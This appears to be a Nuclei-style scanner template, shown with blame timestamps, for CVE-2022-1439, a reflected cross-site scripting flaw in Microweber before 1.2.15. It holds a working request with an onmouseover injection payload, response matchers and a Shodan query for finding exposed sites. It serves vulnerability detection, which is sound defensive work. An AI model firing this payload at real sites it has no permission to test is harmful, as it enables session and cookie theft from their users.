2022-05-06 09:56:54 +00:00
id : CVE-2022-1439
info :
2022-09-16 19:50:10 +00:00
name : Microweber <1.2.15 - Cross-Site Scripting
2022-05-06 09:56:54 +00:00
author : pikpikcu
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
2022-05-06 09:56:54 +00:00
reference :
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
2022-05-17 09:18:12 +00:00
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
2022-05-06 09:56:54 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1439
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00133
2023-10-26 18:00:24 +00:00
epss-percentile : 0.48142
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-05-06 09:56:54 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:780351152
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,microweber,xss,huntr
2022-05-06 09:56:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-06 09:56:54 +00:00
- method : GET
path :
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-10-27 06:32:23 +00:00
# digest: 4a0a00473045022005673a35949d2bbf8d1fafb795f5d0ed69ec1a915ed140c1f7aba8d850fdc3f0022100ece7eda80d6b5821091c7562788ef298d19bdd625de42c80923dec4db92abfc7:922c64590222798bb761d5b6d8e72950